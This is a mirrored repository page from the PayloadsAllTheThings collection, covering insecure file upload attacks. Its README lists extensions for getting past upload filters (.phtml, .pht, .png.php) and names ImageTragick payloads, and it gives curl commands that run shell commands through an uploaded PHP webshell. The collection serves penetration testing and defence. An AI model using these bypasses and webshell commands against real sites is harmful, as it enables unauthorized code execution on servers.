Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-07-03 08:58:17 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
58aed12c9d
PayloadsAllTheThings/Upload insecure files
History
Swissky e89e4fd312 Methodology updated with RPCClient, User enumeration
2017-05-17 20:40:45 +02:00
..
Image Tragik Methodology updated with RPCClient, User enumeration 2017-05-17 20:40:45 +02:00
Insecure Flash Methodo, SQL,RCE,XSS,XXE updated 2016-12-20 19:46:06 +01:00
JPG Resize Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Metadata GIF Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Metadata PNG Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
PHP Extension Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
PNG Resize Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
README.md Methodo, SQL,RCE,XSS,XXE updated 2016-12-20 19:46:06 +01:00

README.md

Upload

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Exploits

Image Tragik

HTTP Request
Reverse Shell
Touch command

PHP Extension

.php

Less known extension
.pht
.pgif
.phtml
.shtml

Double extension
.jpeg.php
.png.php

PNG Bypass a resize - Upload the picture and use a local file inclusion

You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"

JPG Bypass a resize - Upload the picture and use a local file inclusion

http://localhost/test.php?c=ls

Thanks to

  • Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil